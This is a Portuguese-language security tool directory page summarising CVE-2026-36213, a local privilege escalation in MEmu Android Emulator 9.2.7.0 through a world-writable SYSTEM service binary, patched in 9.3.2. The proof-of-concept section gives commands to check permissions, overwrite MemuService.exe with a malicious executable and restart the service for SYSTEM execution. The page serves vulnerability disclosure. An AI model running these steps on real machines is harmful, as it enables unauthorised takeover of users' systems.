Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-36213 — CVE-2026-36213 | Local Privilege Escalation in MEmu Android Emulator 9.2.7.0 via Insecure Service Binary Permissions | Patched in 9.3.2 | Kitploit
Ferramentas/GitHubGitHub/sec-zone/cve-2026-36213
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingLearning & EducationBinary Exploitation
GitHubsec-zone/cve-2026-36213

CVE-2026-36213

CVE-2026-36213 | Local Privilege Escalation in MEmu Android Emulator 9.2.7.0 via Insecure Service Binary Permissions | Patched in 9.3.2

Ver Repositório
51há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-36213

CVE-2026-36213 | Escalada de Privilégio Local no MEmu Android Emulator 9.2.7.0 via Permissões Inseguras de Binário de Serviço | Corrigido na versão 9.3.2

CVE-2026-36213 — MEmu Android Emulator 9.2.7.0 LPE

CVE CVSS Status Platform

Resumo

Uma vulnerabilidade de Escalada de Privilégio Local (LPE) no MEmu Android Emulator 9.2.7.0.
O serviço MEmuSVC é executado como NT AUTHORITY\SYSTEM enquanto seu binário é gravável por qualquer usuário local, permitindo comprometimento total do sistema.

CampoDetalhes
CVECVE-2026-36213
ProdutoMEmu Android Emulator (MicroVirt)
Versão Afetada9.2.7.0 e anteriores
Versão Corrigida9.3.2
CWECWE-732 / CWE-269
CVSS v3.17.8 HIGH AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
ATT&CKT1574.010

Vulnerabilidade

MEmuService.exe é instalado como um serviço do Windows no nível SYSTEM com permissões NTFS inseguras:

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

BUILTIN\Users:(F)   ← Any local user has Full Control
Everyone:(F)        ← World-writable binary

Prova de Conceito

:: Step 1 - Verify vulnerable permissions

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

:: Step 2 - Replace binary (as low-priv user)

root@kitploit:~
copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y

:: Step 3 - Restart service

root@kitploit:~
sc stop MEmuSVC && sc start MEmuSVC

:: Result: malicious.exe runs as NT AUTHORITY\SYSTEM

Script de Detecção

Disponível em: https://github.com/sec-zone/Hijack-service-binaries

Aviso Legal

Esta pesquisa foi conduzida para fins educacionais sob política de divulgação responsável.
O autor não é responsável por qualquer uso indevido destas informações.

Pesquisador

Nome: Mohammad Hossein Ashofte Yazdi
LinkedIn: https://www.linkedin.com/in/seczone64
Twitter: @sec_zone64
E-mail: [email protected]

Baixar ferramenta